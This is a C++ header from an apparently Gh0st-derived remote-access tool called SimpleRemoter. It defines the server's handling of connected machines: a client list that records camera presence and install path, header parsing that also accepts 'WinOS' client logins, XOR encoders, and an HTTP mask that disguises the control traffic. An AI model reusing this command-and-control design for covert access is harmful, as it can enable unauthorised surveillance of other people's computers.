Files
SimpleRemoter/server/2015Remote/Server.h
2025-11-08 18:00:21 +01:00

639 lines
19 KiB
C++
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
#pragma once
#include "stdafx.h"
#include "common/mask.h"
#include "common/header.h"
#include "common/encrypt.h"
#include "Buffer.h"
#define XXH_INLINE_ALL
#include "xxhash.h"
#include <WS2tcpip.h>
#include <common/ikcp.h>
#define PACKET_LENGTH 0x2000
std::string GetPeerName(SOCKET sock);
std::string GetRemoteIP(SOCKET sock);
enum {
ONLINELIST_IP = 0, // IP的列顺序
ONLINELIST_ADDR, // 地址
ONLINELIST_LOCATION, // 地理位置
ONLINELIST_COMPUTER_NAME, // 计算机名/备注
ONLINELIST_OS, // 操作系统
ONLINELIST_CPU, // CPU
ONLINELIST_VIDEO, // 摄像头(有无)
ONLINELIST_PING, // PING(对方的网速)
ONLINELIST_VERSION, // 版本信息
ONLINELIST_INSTALLTIME, // 安装时间
ONLINELIST_LOGINTIME, // 活动窗口
ONLINELIST_CLIENTTYPE, // 客户端类型
ONLINELIST_PATH, // 文件路径
ONLINELIST_MAX,
};
enum {
PARSER_WINOS = -2,
PARSER_FAILED = -1, // 解析失败
PARSER_NEEDMORE = 0, // 需要更多数据
};
typedef struct PR {
int Result;
bool IsFailed() const
{
return PARSER_FAILED == Result;
}
bool IsNeedMore() const
{
return PARSER_NEEDMORE == Result;
}
bool IsWinOSLogin() const
{
return PARSER_WINOS == Result;
}
} PR;
enum {
COMPRESS_UNKNOWN = -2, // 未知压缩算法
COMPRESS_ZLIB = -1, // 以前版本使用的压缩方法
COMPRESS_ZSTD = 0, // 当前使用的压缩方法
COMPRESS_NONE = 1, // 没有压缩
};
// Header parser: parse the data to make sure it's from a supported client.
class HeaderParser
{
friend class CONTEXT_OBJECT;
protected:
HeaderParser()
{
m_Masker = nullptr;
m_Encoder = nullptr;
m_Encoder2 = nullptr;
m_bParsed = FALSE;
m_nHeaderLen = m_nCompareLen = m_nFlagLen = 0;
m_nFlagType = FLAG_UNKNOWN;
memset(m_szPacketFlag, 0, sizeof(m_szPacketFlag));
}
virtual ~HeaderParser()
{
Reset();
}
std::string getXForwardedFor(const std::string& headers)
{
const std::string key = "X-Forwarded-For: ";
size_t pos = headers.find(key);
if (pos == std::string::npos)
return "";
pos += key.size();
size_t end = headers.find("\r\n", pos);
if (end == std::string::npos)
return "";
std::string ip = headers.substr(pos, end - pos);
return ip;
}
PR Parse(CBuffer& buf, int& compressMethod, std::string &peer)
{
const int MinimumCount = MIN_COMLEN;
if (buf.GetBufferLength() < MinimumCount) {
return PR{ PARSER_NEEDMORE };
}
// UnMask
char* src = (char*)buf.GetBuffer();
ULONG srcSize = buf.GetBufferLength();
PkgMaskType maskType = MaskTypeUnknown;
ULONG ret = TryUnMask(src, srcSize, maskType);
std::string str = buf.Skip(ret);
if (maskType == MaskTypeHTTP) {
std::string clientIP = getXForwardedFor(str);
if (!clientIP.empty()) peer = clientIP;
}
if (nullptr == m_Masker) {
m_Masker = maskType ? new HttpMask(peer) : new PkgMask();
}
if ((maskType && ret == 0) || (buf.GetBufferLength() <= MinimumCount))
return PR{ PARSER_NEEDMORE };
char szPacketFlag[32] = { 0 };
buf.CopyBuffer(szPacketFlag, MinimumCount, 0);
HeaderEncType encTyp = HeaderEncUnknown;
FlagType flagType = CheckHead(szPacketFlag, encTyp);
if (flagType == FLAG_UNKNOWN) {
// 数据长度 + 通信密码 [4字节启动时间+4个0字节+命令标识+系统位数标识]
const BYTE* ptr = (BYTE*)buf.GetBuffer(0), * p = ptr + 4;
int length = *((int*)ptr);
int excepted = buf.GetBufferLength();
if (length == excepted && length == 16 && p[4] == 0 && p[5] == 0 &&
p[6] == 0 && p[7] == 0 && p[8] == 202 && (p[9] == 0 || p[9] == 1)) {
m_nFlagType = FLAG_WINOS;
compressMethod = COMPRESS_NONE;
memcpy(m_szPacketFlag, p, 10); // 通信密码
m_nCompareLen = 0;
m_nFlagLen = 0;
m_nHeaderLen = 14;
m_bParsed = TRUE;
m_Encoder = new Encoder();
m_Encoder2 = new WinOsEncoder();
return PR{ PARSER_WINOS };
}
return PR{ PARSER_FAILED };
}
if (m_bParsed) { // Check if the header has been parsed.
return memcmp(m_szPacketFlag, szPacketFlag, m_nCompareLen) == 0 ? PR{ m_nFlagLen } : PR{ PARSER_FAILED };
}
// More version may be added in the future.
switch (m_nFlagType = flagType) {
case FLAG_UNKNOWN:
return PR{ PARSER_FAILED };
case FLAG_SHINE:
memcpy(m_szPacketFlag, szPacketFlag, 5);
m_nCompareLen = 5;
m_nFlagLen = m_nCompareLen;
m_nHeaderLen = m_nFlagLen + 8;
m_bParsed = TRUE;
assert(NULL==m_Encoder);
assert(NULL==m_Encoder2);
m_Encoder = new Encoder();
m_Encoder2 = new Encoder();
break;
case FLAG_FUCK:
memcpy(m_szPacketFlag, szPacketFlag, 8);
m_nCompareLen = 8;
m_nFlagLen = m_nCompareLen + 3;
m_nHeaderLen = m_nFlagLen + 8;
m_bParsed = TRUE;
m_Encoder = new XOREncoder();
m_Encoder2 = new Encoder();
break;
case FLAG_HELLO:
// This header is only for handling SOCKET_DLLLOADER command
memcpy(m_szPacketFlag, szPacketFlag, 8);
m_nCompareLen = 6;
m_nFlagLen = 8;
m_nHeaderLen = m_nFlagLen + 8;
m_bParsed = TRUE;
compressMethod = COMPRESS_NONE;
m_Encoder = new Encoder();
m_Encoder2 = new XOREncoder16();
break;
case FLAG_HELL:
// This version
memcpy(m_szPacketFlag, szPacketFlag, 8);
m_nCompareLen = FLAG_COMPLEN;
m_nFlagLen = FLAG_LENGTH;
m_nHeaderLen = m_nFlagLen + 8;
m_bParsed = TRUE;
m_Encoder = new Encoder();
m_Encoder2 = new XOREncoder16();
break;
default:
break;
}
return PR{ m_nFlagLen };
}
BOOL IsEncodeHeader() const
{
return m_nFlagType == FLAG_HELLO || m_nFlagType == FLAG_HELL;
}
HeaderParser& Reset()
{
if (m_Masker) {
m_Masker->Destroy();
m_Masker = nullptr;
}
SAFE_DELETE(m_Encoder);
SAFE_DELETE(m_Encoder2);
m_bParsed = FALSE;
m_nHeaderLen = m_nCompareLen = m_nFlagLen = 0;
m_nFlagType = FLAG_UNKNOWN;
memset(m_szPacketFlag, 0, sizeof(m_szPacketFlag));
return *this;
}
BOOL IsParsed() const
{
return m_bParsed;
}
int GetFlagLen() const
{
return m_nFlagLen;
}
int GetHeaderLen() const
{
return m_nHeaderLen;
}
const char* GetFlag() const
{
return m_szPacketFlag;
}
FlagType GetFlagType() const
{
return m_nFlagType;
}
Encoder* GetEncoder() const
{
return m_Encoder;
}
Encoder* GetEncoder2() const
{
return m_Encoder2;
}
private:
BOOL m_bParsed; // 数据包是否可以解析
int m_nHeaderLen; // 数据包的头长度
int m_nCompareLen; // 比对字节数
int m_nFlagLen; // 标识长度
FlagType m_nFlagType; // 标识类型
char m_szPacketFlag[32]; // 对比信息
Encoder* m_Encoder; // 编码器
Encoder* m_Encoder2; // 编码器2
PkgMask* m_Masker;
};
enum IOType {
IOInitialize,
IORead,
IOWrite,
IOIdle
};
#define TRACK_OVERLAPPEDPLUS 0
class OVERLAPPEDPLUS
{
public:
OVERLAPPED m_ol;
IOType m_ioType;
OVERLAPPEDPLUS(IOType ioType)
{
#if TRACK_OVERLAPPEDPLUS
char szLog[100];
sprintf_s(szLog, "=> [new] OVERLAPPEDPLUS %p by thread [%d].\n", this, GetCurrentThreadId());
Mprintf(szLog);
#endif
ZeroMemory(this, sizeof(OVERLAPPEDPLUS));
m_ioType = ioType;
}
~OVERLAPPEDPLUS()
{
#if TRACK_OVERLAPPEDPLUS
char szLog[100];
sprintf_s(szLog, "=> [delete] OVERLAPPEDPLUS %p by thread [%d].\n", this, GetCurrentThreadId());
Mprintf(szLog);
#endif
}
};
typedef BOOL (CALLBACK* pfnNotifyProc)(CONTEXT_OBJECT* ContextObject);
typedef BOOL (CALLBACK* pfnOfflineProc)(CONTEXT_OBJECT* ContextObject);
class Server
{
public:
friend class CONTEXT_OBJECT;
Server() {}
virtual ~Server() {}
virtual int GetPort() const = 0;
virtual UINT StartServer(pfnNotifyProc NotifyProc, pfnOfflineProc OffProc, USHORT uPort) = 0;
virtual BOOL Send2Client(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, ULONG ulOriginalLength) = 0;
virtual void UpdateMaxConnection(int maxConn) {}
virtual void Destroy() {}
virtual void Disconnect(CONTEXT_OBJECT* ctx) {}
};
class context
{
public:
// 纯虚函数
virtual VOID InitMember(SOCKET s, Server* svr)=0;
virtual BOOL Send2Client(PBYTE szBuffer, ULONG ulOriginalLength) = 0;
virtual CString GetClientData(int index)const = 0;
virtual void GetAdditionalData(CString(&s)[RES_MAX]) const =0;
virtual CString GetAdditionalData(int index) const = 0;
virtual uint64_t GetClientID() const = 0;
virtual std::string GetPeerName() const = 0;
virtual int GetPort() const = 0;
virtual std::string GetProtocol() const = 0;
virtual int GetServerPort() const = 0;
virtual FlagType GetFlagType() const = 0;
virtual std::string GetGroupName() const = 0;
public:
virtual ~context() {}
virtual void Destroy() {}
virtual BOOL IsLogin() const
{
return TRUE;
}
virtual bool IsEqual(context *ctx) const
{
return this == ctx || (GetPeerName() == ctx->GetPeerName() && GetPort() == ctx->GetPort());
}
};
typedef class CONTEXT_OBJECT : public context
{
public:
virtual ~CONTEXT_OBJECT()
{
if (kcp) {
ikcp_release(kcp);
kcp = nullptr;
}
}
CString sClientInfo[ONLINELIST_MAX];
CString additonalInfo[RES_MAX];
SOCKET sClientSocket;
WSABUF wsaInBuf;
WSABUF wsaOutBuffer;
char szBuffer[PACKET_LENGTH];
CBuffer InCompressedBuffer; // 接收到的压缩的数据
CBuffer InDeCompressedBuffer; // 解压后的数据
CBuffer OutCompressedBuffer;
HWND hWnd;
HANDLE hDlg;
OVERLAPPEDPLUS* olps; // OVERLAPPEDPLUS
int CompressMethod; // 压缩算法
HeaderParser Parser; // 解析数据协议
uint64_t ID; // 唯一标识
BOOL m_bProxyConnected; // 代理是否连接
BOOL bLogin; // 是否 login
std::string PeerName; // 对端IP
Server* server; // 所属服务端
ikcpcb* kcp = nullptr; // 新增指向KCP会话
std::string GroupName; // 分组名称
CLock SendLock; // fix #214
std::string GetProtocol() const override
{
return Parser.m_Masker && Parser.m_Masker->GetMaskType() == MaskTypeNone ? "TCP" : "HTTP";
}
int GetServerPort() const override
{
return server->GetPort();
}
VOID InitMember(SOCKET s, Server *svr)
{
memset(szBuffer, 0, sizeof(char) * PACKET_LENGTH);
hWnd = NULL;
hDlg = NULL;
sClientSocket = s;
PeerName = ::GetPeerName(sClientSocket);
memset(&wsaInBuf, 0, sizeof(WSABUF));
memset(&wsaOutBuffer, 0, sizeof(WSABUF));
olps = NULL;
for (int i = 0; i < ONLINELIST_MAX; i++) {
sClientInfo[i].Empty();
}
for (int i = 0; i < RES_MAX; i++) {
additonalInfo[i].Empty();
}
CompressMethod = COMPRESS_ZSTD;
Parser.Reset();
bLogin = FALSE;
m_bProxyConnected = FALSE;
server = svr;
}
Server* GetServer()
{
return server;
}
BOOL Send2Client(PBYTE szBuffer, ULONG ulOriginalLength) override
{
if (server) {
CAutoCLock L(SendLock);
return server->Send2Client(this, szBuffer, ulOriginalLength);
}
return FALSE;
}
VOID SetClientInfo(const CString(&s)[ONLINELIST_MAX], const std::vector<std::string>& a = {})
{
for (int i = 0; i < ONLINELIST_MAX; i++) {
sClientInfo[i] = s[i];
}
for (int i = 0; i < a.size(); i++) {
additonalInfo[i] = a[i].c_str();
}
}
PBYTE GetBuffer(int offset)
{
return InDeCompressedBuffer.GetBuffer(offset);
}
ULONG GetBufferLength()
{
return InDeCompressedBuffer.GetBufferLength();
}
virtual std::string GetPeerName() const
{
return PeerName;
}
virtual int GetPort() const
{
return sClientSocket;
}
CString GetClientData(int index) const override
{
return sClientInfo[index];
}
void GetAdditionalData(CString(&s)[RES_MAX]) const override
{
for (int i = 0; i < RES_MAX; i++) {
s[i] = additonalInfo[i];
}
}
CString GetAdditionalData(int index) const override
{
return additonalInfo[index];
}
std::string GetGroupName() const override
{
return GroupName;
}
BOOL IsLogin() const override
{
return bLogin;
}
uint64_t GetClientID() const override
{
return ID;
}
void CancelIO()
{
SAFE_CANCELIO(sClientSocket);
}
BOOL CopyBuffer(PVOID pDst, ULONG nLen, ULONG ulPos)
{
return InDeCompressedBuffer.CopyBuffer(pDst, nLen, ulPos);
}
BYTE GetBYTE(int offset)
{
return InDeCompressedBuffer.GetBYTE(offset);
}
virtual FlagType GetFlagType() const override
{
return Parser.m_nFlagType;
}
// Write compressed buffer.
void WriteBuffer(LPBYTE data, ULONG dataLen, ULONG originLen, int cmd = -1)
{
if (Parser.IsParsed()) {
ULONG totalLen = dataLen + Parser.GetHeaderLen();
BYTE szPacketFlag[32] = {};
const int flagLen = Parser.GetFlagLen();
memcpy(szPacketFlag, Parser.GetFlag(), flagLen);
if (Parser.IsEncodeHeader())
encrypt(szPacketFlag, FLAG_COMPLEN, szPacketFlag[flagLen - 2]);
CBuffer buf;
buf.WriteBuffer((LPBYTE)szPacketFlag, flagLen);
buf.WriteBuffer((PBYTE)&totalLen, sizeof(ULONG));
if (Parser.GetFlagType() == FLAG_WINOS) {
memcpy(szPacketFlag, Parser.GetFlag(), 10);
buf.WriteBuffer((PBYTE)Parser.GetFlag(), 10);
} else {
buf.WriteBuffer((PBYTE)&originLen, sizeof(ULONG));
InDeCompressedBuffer.CopyBuffer(szPacketFlag + flagLen, 16, 16);
}
Encode2(data, dataLen, szPacketFlag);
buf.WriteBuffer(data, dataLen);
// Mask
char* src = (char*)buf.GetBuffer(), *szBuffer = nullptr;
ULONG ulLength = 0;
Parser.m_Masker->Mask(szBuffer, ulLength, src, buf.GetBufferLen(), cmd);
OutCompressedBuffer.WriteBuffer((LPBYTE)szBuffer, ulLength);
if (szBuffer != src)
SAFE_DELETE_ARRAY(szBuffer);
}
}
// Read compressed buffer.
PBYTE ReadBuffer(ULONG& dataLen, ULONG& originLen)
{
if (Parser.IsParsed()) {
ULONG totalLen = 0;
BYTE szPacketFlag[32] = {};
InCompressedBuffer.ReadBuffer((PBYTE)szPacketFlag, Parser.GetFlagLen());
InCompressedBuffer.ReadBuffer((PBYTE)&totalLen, sizeof(ULONG));
if (Parser.GetFlagType() == FLAG_WINOS) {
InCompressedBuffer.ReadBuffer((PBYTE)szPacketFlag, 10);
} else {
InCompressedBuffer.ReadBuffer((PBYTE)&originLen, sizeof(ULONG));
}
dataLen = totalLen - Parser.GetHeaderLen();
PBYTE CompressedBuffer = new BYTE[dataLen];
InCompressedBuffer.ReadBuffer(CompressedBuffer, dataLen);
Decode2(CompressedBuffer, dataLen, szPacketFlag);
return CompressedBuffer;
}
return nullptr;
}
// Parse the data to make sure it's from a supported client. The length of `Header Flag` will be returned.
PR Parse(CBuffer& buf)
{
return Parser.Parse(buf, CompressMethod, PeerName);
}
void Encode(PBYTE data, bool &flag) const
{
flag ? data[0] ^= 0x2B : 0x2B == 0x2B;
}
// Encode data before compress.
void Encode(PBYTE data, int len) const
{
Parser.GetEncoder()->Encode((unsigned char*)data, len);
}
// Decode data after uncompress.
void Decode(PBYTE data, int len) const
{
Parser.GetEncoder()->Decode((unsigned char*)data, len);
}
// Encode data after compress.
void Encode2(PBYTE data, int len, PBYTE param) const
{
Parser.GetEncoder2()->Encode((unsigned char*)data, len, param);
}
// Decode data before uncompress.
void Decode2(PBYTE data, int len, PBYTE param) const
{
Parser.GetEncoder2()->Decode((unsigned char*)data, len, param);
}
std::string RemoteAddr() const
{
sockaddr_in ClientAddr = {};
int ulClientAddrLen = sizeof(sockaddr_in);
int s = getpeername(sClientSocket, (SOCKADDR*)&ClientAddr, &ulClientAddrLen);
return s != INVALID_SOCKET ? inet_ntoa(ClientAddr.sin_addr) : "";
}
static uint64_t CalculateID(const CString(&data)[ONLINELIST_MAX])
{
int idx[] = { ONLINELIST_IP, ONLINELIST_COMPUTER_NAME, ONLINELIST_OS, ONLINELIST_CPU, ONLINELIST_PATH, };
CString s;
for (int i = 0; i < 5; i++) {
s += data[idx[i]] + "|";
}
s.Delete(s.GetLength() - 1);
return XXH64(s.GetString(), s.GetLength(), 0);
}
uint64_t GetID() const
{
return ID;
}
void SetID(uint64_t id)
{
ID = id;
}
void SetGroup(const std::string& group)
{
GroupName = group;
}
} CONTEXT_OBJECT, * PCONTEXT_OBJECT;
typedef CList<PCONTEXT_OBJECT> ContextObjectList;
class CONTEXT_UDP : public CONTEXT_OBJECT
{
public:
int addrLen = 0;
sockaddr_in clientAddr = {};
CONTEXT_UDP()
{
}
virtual ~CONTEXT_UDP()
{
}
std::string GetProtocol() const override
{
return "UDP";
}
VOID InitMember(SOCKET s, Server* svr) override
{
CONTEXT_OBJECT::InitMember(s, svr);
clientAddr = {};
addrLen = sizeof(sockaddr_in);
}
void Destroy() override
{
delete this;
}
virtual std::string GetPeerName() const override
{
char client_ip[INET_ADDRSTRLEN];
inet_ntop(AF_INET, &clientAddr.sin_addr, client_ip, INET_ADDRSTRLEN);
return client_ip;
}
virtual int GetPort() const override
{
int client_port = ntohs(clientAddr.sin_port);
return client_port;
}
};